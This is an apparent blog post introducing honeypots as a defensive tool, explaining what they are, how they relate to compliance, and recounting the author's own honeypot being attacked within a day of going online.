Sun Tzu said in The Art of War, “… if you know your enemies and know yourself, you will not be imperiled in a hundred battles; if you do not know your enemies but do know yourself, you will win one and lose one; if you do not know your enemies nor yourself, you will be imperiled in every single battle.”
This is great advice from the 6th century BC that is still relevant today. The only thing that has changed is that our battles are fought in cyberspace.
In order to know your enemy you need to see what they are doing so you can be prepared for the up coming battle. The honeypot gives you the ability to replay the
sessions of the hackers to see exactly what they typed and downloaded to the honeypot. It is more relevant than a threat feed from a vendor because the honeypot shows you a view of the battle happening right outside of your door at the edge of your organization. The only thing keeping the enemy out is your firewall.
The SANS Institute defines a honeypot as a computer that is configured to be a decoy server to gather information regarding an attacker or intruder into your system. Hackers’ activities are recorded and all files that are downloaded to the honeypot are captured and stored for analysis by the owner of the honeypot.
Think of a honey pot as a computer that has not been patched and does not have any anti-virus software on it. It’s like the “bait car” that police leave on the street with the keys in it and wait for a thief to steal it … but in this case it’s a virtual computer and there is nothing to steal. The honeypot is the bait computer the hacker uses to install their own software and try to hack your network. But the honey pot is not a computer but rather is a sophisticated emulator that simulates a computer and cannot be used to do harm. The honeypot is a sandbox or a trap that the hacker or malware can be placed inside of so they can be observed.
How will honeypots help you with your compliance mandates?
All compliance mandates are intended to protect your organizations intellectual property, customer data, and payment card information. By knowing your enemy you can be aware of their tactics, where they are coming from and where they want to send data to. You might find out that your enemy is your competitor, a foreign state, or even a former employee.
A “honeydrive” is a virtual honeypot that can be downloaded for free from sourceforge and is very easy to setup.
I recently set up a honeypot and it was successfully attacked within one day of it being turned on directly connected to the Internet. Below are some screenshots showing who has been attacking me and from what countries. I was amazed to see where some of the attacks were coming from.